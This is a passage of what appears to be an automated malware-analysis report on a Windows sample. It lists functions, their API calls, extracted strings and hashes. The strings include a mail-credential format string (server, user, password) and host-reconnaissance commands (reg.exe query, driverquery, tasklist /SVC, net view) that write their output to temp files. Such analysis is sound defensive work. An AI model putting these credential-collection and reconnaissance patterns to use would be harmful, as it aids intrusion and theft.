                                                                                                                                        • type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s, xrefs: 00459EAB
                                                                                                                                        • _iF, xrefs: 00459EB1
                                                                                                                                        • PG, xrefs: 00459DBA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: PG$_iF$type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
                                                                                                                                        • API String ID: 1659193697-289553900
                                                                                                                                        • Opcode ID: e1e219896813bcc36e95186cff7549e9831ee63287abb3493b69ff1f566c49a4
                                                                                                                                        • Instruction ID: c9f2556f0038c5272163f0b105cb68f311e4959b0a153bc224695f05ed0ea2c1
                                                                                                                                        • Opcode Fuzzy Hash: e1e219896813bcc36e95186cff7549e9831ee63287abb3493b69ff1f566c49a4
                                                                                                                                        • Instruction Fuzzy Hash: 3C411E71E00205EBCB14DFA9C881A6FB7F9BF54305B24882EE855E3352E778ED088B54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045F820, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,74B05520), ref: 0045F837
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0045F83F
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0045F8AA
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0045F8D5
                                                                                                                                        • memcpy.NTDLL(00000000,00000002,?), ref: 0045F8E6
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 0045F8FC
                                                                                                                                        • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0045F90E
                                                                                                                                        • memcpy.NTDLL(00000000,004683E4,00000002,00000000,?,?,00000000,?,?), ref: 0045F921
                                                                                                                                        • memcpy.NTDLL(00000000,?,00000002), ref: 0045F936
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy$lstrlen$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3386453358-0
                                                                                                                                        • Opcode ID: cc693f297f4623acd6cd62e218ada48d2c9308977763f02d203f902be8e586e5
                                                                                                                                        • Instruction ID: 5efea0c7a6bfa79d83b29dfe2acf64f178db5eae509d628692144a7bf5bcf123
                                                                                                                                        • Opcode Fuzzy Hash: cc693f297f4623acd6cd62e218ada48d2c9308977763f02d203f902be8e586e5
                                                                                                                                        • Instruction Fuzzy Hash: 50417F72D00209FBCF00DFA5CC84A9EBBB8FF48359F14446AED04A3242E7759A58CB95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045F815, Relevance: 13.6, APIs: 9, Instructions: 100stringmemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,74B05520), ref: 0045F837
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0045F83F
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0045F8AA
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0045F8D5
                                                                                                                                        • memcpy.NTDLL(00000000,00000002,?), ref: 0045F8E6
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 0045F8FC
                                                                                                                                        • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0045F90E
                                                                                                                                        • memcpy.NTDLL(00000000,004683E4,00000002,00000000,?,?,00000000,?,?), ref: 0045F921
                                                                                                                                        • memcpy.NTDLL(00000000,?,00000002), ref: 0045F936
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy$lstrlen$AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3386453358-0
                                                                                                                                        • Opcode ID: 9215da65ba4eab128eb445d505052954d1aa1aadf17486145b110851785622cf
                                                                                                                                        • Instruction ID: dc85f099dd65bb8460679c07408f592f165fd69997f6d45227f84d2011f2d211
                                                                                                                                        • Opcode Fuzzy Hash: 9215da65ba4eab128eb445d505052954d1aa1aadf17486145b110851785622cf
                                                                                                                                        • Instruction Fuzzy Hash: 50319F72D00209FBCF009FA6CC80A9FBBB8FF48359F14446AED04A3202E7359A19CB55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044178F, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 004417D0
                                                                                                                                        • GetLastError.KERNEL32 ref: 004417DA
                                                                                                                                        • WaitForSingleObject.KERNEL32(000000C8), ref: 004417FF
                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00441820
                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00441848
                                                                                                                                        • WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 0044185D
                                                                                                                                        • SetEndOfFile.KERNEL32(?), ref: 0044186A
                                                                                                                                        • GetLastError.KERNEL32 ref: 00441876
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00441882
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2864405449-0
                                                                                                                                        • Opcode ID: d08ae79fe90e607999a946ae2d8b7381acab17c006cd079850f2048285eaf959
                                                                                                                                        • Instruction ID: b485e29a3e50119c195944f0a51a27dc2665de7a606d5513865dfb9d8e712c16
                                                                                                                                        • Opcode Fuzzy Hash: d08ae79fe90e607999a946ae2d8b7381acab17c006cd079850f2048285eaf959
                                                                                                                                        • Instruction Fuzzy Hash: AD31847190020CFBEB119FA4DD09BAE7B75EB00315F144665F910E61E0D7B48E94DB2A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044E498, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,004633AC,00000008,00461E90,00000010,00000001,00000000,0000012B,00461E90,00000000), ref: 0044E4B7
                                                                                                                                        • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0044E4EB
                                                                                                                                        • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0044E4F3
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044E4FD
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 0044E519
                                                                                                                                        • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0044E532
                                                                                                                                        • CancelIo.KERNEL32(?), ref: 0044E547
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0044E557
                                                                                                                                        • GetLastError.KERNEL32 ref: 0044E55F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4263211335-0
                                                                                                                                        • Opcode ID: dbbd8c2feb06ff0e7d56fd17966df879f37e228798f7b6aaf5e41d65ff59e8fb
                                                                                                                                        • Instruction ID: 0a703efac53ad864739afd96da763bcf78d47986d34460f9046865737424999e
                                                                                                                                        • Opcode Fuzzy Hash: dbbd8c2feb06ff0e7d56fd17966df879f37e228798f7b6aaf5e41d65ff59e8fb
                                                                                                                                        • Instruction Fuzzy Hash: DF215172900118FFEB109FA9DC489EF7BB9FF49354F004526F906D2250EBB49A45CBA6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045EC0D, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 202synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00001000,?,0046E130,74B5F750), ref: 0045EC8E
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,0046E130,74B5F750), ref: 0045ED13
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,0046E130,74B5F750), ref: 0045ED2D
                                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000,?,?,?,0046E130,74B5F750), ref: 0045ED62
                                                                                                                                          • Part of subcall function 0044510C: RtlReAllocateHeap.NTDLL(00000000,0046E130,0046E130,0045ECD1), ref: 0044511C
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,?,0046E130,74B5F750), ref: 0045EDE4
                                                                                                                                        • CloseHandle.KERNEL32(?,?,0046E130,74B5F750), ref: 0045EE0B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                                                                                                                        • String ID: IjD
                                                                                                                                        • API String ID: 3115907006-1856596473
                                                                                                                                        • Opcode ID: a94a8736f0d505864bd0d45b3964f614ad74b5736fab18bf3507e3b78f711011
                                                                                                                                        • Instruction ID: 599cd383e3f9cf209280090e73aef80061f9f70bc7383fa446f1e9edd0f9ff0b
                                                                                                                                        • Opcode Fuzzy Hash: a94a8736f0d505864bd0d45b3964f614ad74b5736fab18bf3507e3b78f711011
                                                                                                                                        • Instruction Fuzzy Hash: C1815C71D00219EFDF15CF95C984AAEBBB5FF08305F14845AE805A7252D738EE49CBA8
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0046592A, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 121stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCommandLineA.KERNEL32(?,00000000,00000000,00452C44,00000000,74B5F5B0,0044BAA6,61636F4C,00000001,?,?), ref: 0046593A
                                                                                                                                        • StrChrA.SHLWAPI(00000000,00000020), ref: 0046594B
                                                                                                                                          • Part of subcall function 0044D57C: lstrlen.KERNEL32(?,?,ss: *.*.*.*,00000000,0045380B,00000000,?,?,?,?,000000FF,?,00000F00), ref: 0044D585
                                                                                                                                          • Part of subcall function 0044D57C: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,?,000000FF,?,00000F00), ref: 0044D5A8
                                                                                                                                          • Part of subcall function 0044D57C: memset.NTDLL ref: 0044D5B7
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00465A7F
                                                                                                                                          • Part of subcall function 004427F6: StrChrA.SHLWAPI(?,?), ref: 0044281C
                                                                                                                                          • Part of subcall function 004427F6: StrTrimA.SHLWAPI(?,0046A48C,00000001), ref: 0044283B
                                                                                                                                          • Part of subcall function 004427F6: StrChrA.SHLWAPI(?,?), ref: 0044284C
                                                                                                                                          • Part of subcall function 004427F6: StrTrimA.SHLWAPI(00000001,0046A48C), ref: 0044285E
                                                                                                                                        • lstrcmp.KERNEL32(?,mail), ref: 004659A8
                                                                                                                                          • Part of subcall function 00454560: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00454583
                                                                                                                                          • Part of subcall function 00454560: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,00000008,?,?,?,0044606A), ref: 004545C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapTrim$AllocateCommandExitFreeLineProcesslstrcmplstrlenmemcpymemset
                                                                                                                                        • String ID: /C pause dll$7gF$mail
                                                                                                                                        • API String ID: 4032499568-727635948
                                                                                                                                        • Opcode ID: b2413f6380c8095295b82f7f7537e5a70067238924653b14a1c81f55f4f51ce2
                                                                                                                                        • Instruction ID: 0007eb150f989dfe4533a3d6c1fe66a77015714b286be7ea1526f2b3d39c6a6d
                                                                                                                                        • Opcode Fuzzy Hash: b2413f6380c8095295b82f7f7537e5a70067238924653b14a1c81f55f4f51ce2
                                                                                                                                        • Instruction Fuzzy Hash: 65318D72604701BFD710EFB1CC8596BB7E9BB88354F10492EF556D2151EA39D9088B1B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00461228, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $hF
                                                                                                                                        • API String ID: 0-4070453796
                                                                                                                                        • Opcode ID: cb28f922c98fc8ef4021ce7c26a211a798cca5d9f02ffd86891baff5df6414a6
                                                                                                                                        • Instruction ID: 280058b64dee84b338a45325999202ffa996d0c5cab8fe9d1f6b47ef1bb1bffe
                                                                                                                                        • Opcode Fuzzy Hash: cb28f922c98fc8ef4021ce7c26a211a798cca5d9f02ffd86891baff5df6414a6
                                                                                                                                        • Instruction Fuzzy Hash: 2941F471A007009FE7209F668C8591BB7E8BB44364B144A3FF567C26A0FBB49845CB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045AAD8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105stringsynchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00449C8C: lstrlen.KERNEL32(?,00000008,00000000,?,74B05520,00458DBF,?,?,00000000,004414AA,?,00000000,?,00464A70,?,00000001), ref: 00449C9B
                                                                                                                                          • Part of subcall function 00449C8C: mbstowcs.NTDLL ref: 00449CB7
                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 0045AB2B
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,00000000,74B069A0,?,00000250,?,00000000), ref: 00456ED2
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 00456EDE
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456F26
                                                                                                                                          • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00456F41
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 00456F79
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(?), ref: 00456F81
                                                                                                                                          • Part of subcall function 00456E86: memset.NTDLL ref: 00456FA4
                                                                                                                                          • Part of subcall function 00456E86: wcscpy.NTDLL ref: 00456FB6
                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 0045AB45
                                                                                                                                        • lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 0045AB6F
                                                                                                                                          • Part of subcall function 00456E86: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00456FDC
                                                                                                                                          • Part of subcall function 00456E86: RtlEnterCriticalSection.NTDLL(?), ref: 00457011
                                                                                                                                          • Part of subcall function 00456E86: RtlLeaveCriticalSection.NTDLL(?), ref: 0045702D
                                                                                                                                          • Part of subcall function 00456E86: FindNextFileW.KERNEL32(?,00000000), ref: 00457046
                                                                                                                                          • Part of subcall function 00456E86: WaitForSingleObject.KERNEL32(00000000), ref: 00457058
                                                                                                                                          • Part of subcall function 00456E86: FindClose.KERNEL32(?), ref: 0045706D
                                                                                                                                          • Part of subcall function 00456E86: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00457081
                                                                                                                                          • Part of subcall function 00456E86: lstrlenW.KERNEL32(0000002C), ref: 004570A3
                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0045AB8C
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 0045ABAD
                                                                                                                                        • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,?,0044606A), ref: 0045ABC2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 2670873185-438819550
                                                                                                                                        • Opcode ID: 0d42f73d1e868b8a872c3b7447e7c7daab4de4ac0eeae8c2145fa5f1136a4b46
                                                                                                                                        • Instruction ID: 65701a8dad9540491daf6c012d9e912d3a6af6f20de2aba65327eebb84367740
                                                                                                                                        • Opcode Fuzzy Hash: 0d42f73d1e868b8a872c3b7447e7c7daab4de4ac0eeae8c2145fa5f1136a4b46
                                                                                                                                        • Instruction Fuzzy Hash: A1317E71404245AFD710DF65C88482BBBEAFB84359F044A2EF98493222E735ED59CB97
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044C3ED, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83memorytimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004536DA: lstrlen.KERNEL32(?,00000000,?,00000000,00464D5C,?,004683E7,00000000,?,?,0045476E,004683E7,?,?,004683E7), ref: 004536E6
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044C417
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044C42A
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0044C43B
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0044C4A6
                                                                                                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 0044C4BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                                                                                                                        • String ID: `F$`F
                                                                                                                                        • API String ID: 3915436794-2341081391
                                                                                                                                        • Opcode ID: 1489b8a017b8196f8db979a02574abb39768f6057b67b698bfd0f9e3031d4008
                                                                                                                                        • Instruction ID: b0ca5dcb034193fff5fe1386c80899a1755fb2f41295160d7d5509bd1d961fdd
                                                                                                                                        • Opcode Fuzzy Hash: 1489b8a017b8196f8db979a02574abb39768f6057b67b698bfd0f9e3031d4008
                                                                                                                                        • Instruction Fuzzy Hash: 8931D131606305DFE720CF59D99492BB7E9FB44321B054A2EF85583260EB78DC16CBDA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00460ED0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63registrymemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00460EEE
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?,74B5F710,00000000), ref: 00460F13
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00460F24
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?), ref: 00460F3F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00460F5D
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00460F66
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                                                                                                                        • String ID: Main
                                                                                                                                        • API String ID: 170146033-521822810
                                                                                                                                        • Opcode ID: 99be40d95ac23bc7f91051817b4dae90380970d4d64bb8bd65f9766963c43917
                                                                                                                                        • Instruction ID: 5556bc2f88ba8c29d2a0c5b0d21f2af57ec39cbb0b5078a0fa37ce712e0df85d
                                                                                                                                        • Opcode Fuzzy Hash: 99be40d95ac23bc7f91051817b4dae90380970d4d64bb8bd65f9766963c43917
                                                                                                                                        • Instruction Fuzzy Hash: 5511F0B6E10109FFDB019F95DD84CEFBBBDEB48304B10447AE901A2120E7B19E54DB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00460761, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,?,000000FF,?,?,00460DE5,?,00000000), ref: 0046077C
                                                                                                                                        • lstrlen.KERNEL32( | "%s" | %u,?,?,00460DE5,?,00000000), ref: 00460787
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 00460798
                                                                                                                                          • Part of subcall function 00458379: GetLocalTime.KERNEL32(?,?,00460DE5,?,00000000), ref: 00458383
                                                                                                                                          • Part of subcall function 00458379: wsprintfA.USER32 ref: 004583B6
                                                                                                                                        • wsprintfA.USER32 ref: 004607BB
                                                                                                                                          • Part of subcall function 00443912: GetSystemTime.KERNEL32(?), ref: 00443930
                                                                                                                                          • Part of subcall function 00443912: wsprintfA.USER32 ref: 0044394E
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000006,?,?,?,00000000), ref: 004607EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                                                                                                                        • String ID: | "%s" | %u$F
                                                                                                                                        • API String ID: 3847261958-3490871454
                                                                                                                                        • Opcode ID: c4adde96d270fe0ec5bef46c866e16653ba8fb3cd8c2e42df055d2e48eac334b
                                                                                                                                        • Instruction ID: dfb0010d80d3e38785a6fab8f68d15d87c0ca04f35f9d25c1ee937fcb523fec4
                                                                                                                                        • Opcode Fuzzy Hash: c4adde96d270fe0ec5bef46c866e16653ba8fb3cd8c2e42df055d2e48eac334b
                                                                                                                                        • Instruction Fuzzy Hash: C2119E71A00108FFDB10AB66DC88D6B7B6DEB44355B100536F808E3221EAB59E05DBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044B6B3, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59stringtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrcmpi.KERNEL32(00000000,Main), ref: 0044B6D4
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044B6E6
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044B6F9
                                                                                                                                        • lstrcmpi.KERNEL32(0046E280,00000000), ref: 0044B71A
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0044F889,00000000), ref: 0044B72E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                                                                                                                        • String ID: Main$`F
                                                                                                                                        • API String ID: 1266740956-1547571671
                                                                                                                                        • Opcode ID: a88e4b4d86c74a04c5a7f504c98989930a2d0d5c763d1a9832ad14c319ce46ee
                                                                                                                                        • Instruction ID: a2acba60d3e302362340c1467be2ff6a3ff1e70aa9d419cee5b6db8f562696dd
                                                                                                                                        • Opcode Fuzzy Hash: a88e4b4d86c74a04c5a7f504c98989930a2d0d5c763d1a9832ad14c319ce46ee
                                                                                                                                        • Instruction Fuzzy Hash: D311E231600204EFEB048F29CC59E9AB7ECFF45321B04826AE405A3350EBB8DD41CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044A87F, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 106stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,004539B4,00000000,?,?,?,004539B4,?,?,?,?,?), ref: 0044A8BD
                                                                                                                                        • lstrlen.KERNEL32(004539B4,?,?,?,004539B4,?,?,?,?,?), ref: 0044A8CF
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0044A943
                                                                                                                                        • lstrlen.KERNEL32(004539B4,00000000,00000000,?,?,?,004539B4,?,?,?,?,?), ref: 0044A958
                                                                                                                                        • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0044A971
                                                                                                                                        • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0044A97A
                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0044A988
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlenmemcpy$FreeLocal
                                                                                                                                        • String ID: $hF
                                                                                                                                        • API String ID: 1123625124-4070453796
                                                                                                                                        • Opcode ID: f43c0589a13537bc96d416c5f1eb5041da53ce90dc9b70d6dcd2d9c5db1cde9e
                                                                                                                                        • Instruction ID: bda6096b8e508d08249c812da096e97a449e7f9c14352c9f50993e37b89c6090
                                                                                                                                        • Opcode Fuzzy Hash: f43c0589a13537bc96d416c5f1eb5041da53ce90dc9b70d6dcd2d9c5db1cde9e
                                                                                                                                        • Instruction Fuzzy Hash: 93310BB280021AABDF10DF66DC458DF3FA8EF143A4F15446AFC0896211E735DE648BE6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00446C74, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 98memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000,?,net view >,00000000), ref: 00446D64
                                                                                                                                        Strings
                                                                                                                                        • driverquery.exe >, xrefs: 00446D12
